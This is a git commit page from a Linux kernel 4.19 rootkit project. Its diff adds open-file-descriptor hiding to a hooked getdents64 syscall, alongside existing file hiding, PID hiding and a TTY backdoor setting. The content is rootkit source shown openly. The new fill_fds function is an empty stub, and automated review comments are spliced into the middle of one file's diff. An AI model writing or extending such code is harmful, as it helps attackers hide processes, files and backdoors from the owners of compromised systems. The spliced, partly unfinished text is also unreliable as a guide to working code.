linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)

commit 65326beeb178c63171971ae3e17ef187ae818f7b
parent 31e98138b510307507cb0c689748505ade0434b4
Author: Tizian Leonhardt <tizianleonhardt@web.de>
Date:   Sat,  5 Dec 2020 19:35:17 +0100

Add rootkit bool for open file hiding, include check for fd list

Diffstat:
Msrc/g7.c | 1+
Msrc/hideopen.c | 6++++++
Msrc/hideopen.h | 5++++-
Msrc/hook.c | 11+++++++----
Msrc/rootkit.h | 1+
5 files changed, 19 insertions(+), 5 deletions(-)

diff --git a/src/g7.c b/src/g7.c
@@ -42,6 +42,7 @@ static struct file_operations g7_fops =
 rootkit_t rootkit = {
 .hiding_files = true,
 .hiding_pids = true,
+ .hiding_open_files = true,
 .backdoor = BD_TTY,
 };
diff --git a/src/hideopen.c b/src/hideopen.c
@@ -68,6 +68,12 @@ may_fd(struct file *dirfile)
 }
 void
+fill_fds(pid_t pid)
+{
+
+}
+
+void
 clear_hidden_fds(void)
 {
 fd_list_t_ptr i = hidden_fds_tail;
diff --git a/src/hideopen.h b/src/hideopen.h
@@ -3,6 +3,8 @@
 #include <linux/types.h>
+#define FD_FROM_NAME(name) ((int)simple_strtol((name), NULL, 10))
+
 typedef struct fd_list *fd_list_t_ptr;
 typedef struct fd_list {
 int fd;
@@ -12,7 +14,8 @@ typedef struct fd_list {
 extern fd_list_t hidden_fds;
-pid_t may_fd(struct file *dirfile);
+pid_t may_fd(struct file *);
+void fill_fds(pid_t);
 void clear_hidden_fds(void);
 bool list_contains_fd(fd_list_t_ptr, int);
diff --git a/src/hook.c b/src/hook.c
@@ -213,9 +213,6 @@ g7_getdents64(const struct pt_regs *pt_regs)
 if (copy_from_user(kdirent, dirent, ret))
 goto yield;
- if((fd_pid = may_fd(dirfile)) != -1)
- is_fd = 1;
-
 atomic_inc(&getdents64_count);
 kdirent_dentry = current->files->fdt->fd[fd]->f_path.dentry;
@@ -235,12 +232,18 @@ g7_getdents64(const struct pt_regs *pt_regs)
 hi_tail = add_inode_to_list(hi_tail, inode);
 }
 }
+
+ if(rootkit.hiding_open_files && ((fd_pid = may_fd(dirfile)) != -1)) {
+ is_fd = 1;
+ fill_fds(fd_pid);
+ }
 for (offset = 0; offset < ret;) {
 cur_kdirent = (dirent64_t_ptr)((char *)kdirent + offset);
 if ((may_proc && list_contains_pid(&hidden_pids, PID_FROM_NAME(cur_kdirent->d_name)))
- || list_contains_inode(hi_head, cur_kdirent->d_ino))
+ || list_contains_inode(hi_head, cur_kdirent->d_ino)
+ || list_contains_fd(&hidden_fds, FD_FROM_NAME(cur_kdirent->d_name)))
 {
 if (cur_kdirent == kdirent) {
 ret -= cur_kdirent->d_reclen;
diff --git a/src/rootkit.h b/src/rootkit.h
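Review bot: `fill_fds(pid_t pid)` in hideopen.c is added with an empty body, yet the same commit already calls it from `g7_getdents64` in hook.c, so its `pid` parameter is unused and nothing is written to `hidden_fds` through it. A one-line comment marking it as a stub, e.g. `/* TODO: stub — presumably meant to populate hidden_fds for pid; not implemented yet */`, plus `(void)pid;` in the body would make the intent explicit and keep -Wunused-parameter quiet. The matching prototype `void fill_fds(pid_t);` in hideopen.h likewise has no comment describing what the function is expected to do or who frees the list it fills.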
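Review bot: `FD_FROM_NAME` in hideopen.h expands to a `simple_strtol` call, but the header only includes `<linux/types.h>`, so the macro compiles only in translation units that have already pulled in `<linux/kernel.h>`; include it in hideopen.h or note the dependency next to the define. The macro also narrows the `long` result to `int` and passes `NULL` as the end pointer, so a non-numeric `d_name` silently evaluates to 0 instead of signalling a parse failure; a comment stating which directory entries it is meant to be applied to would document that assumption (it appears to mirror `PID_FROM_NAME`, which hook.c uses but which is not visible on this page).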
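Review bot: In the second hook.c hunk the new `|| list_contains_fd(&hidden_fds, FD_FROM_NAME(cur_kdirent->d_name))` term is evaluated for every entry, whereas the pid term two lines above is gated by `may_proc &&`; the asymmetry reads as inconsistent with the surrounding style, since `is_fd` is set in the added block but has no reader anywhere in this hunk. If the gate is intended, the consistent form would be `|| (is_fd && list_contains_fd(&hidden_fds, FD_FROM_NAME(cur_kdirent->d_name)))`. Note also that `fill_fds` is an empty stub in this same commit, so the new condition can only match whatever `hidden_fds` held before the call; `g7_getdents64` begins and ends outside the hunk.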
@@ -13,6 +13,7 @@ typedef struct {
 sc_hook_t hooks[16];
 bool hiding_files;
 bool hiding_pids;
+ bool hiding_open_files;
 bd_state_t backdoor;
 } rootkit_t;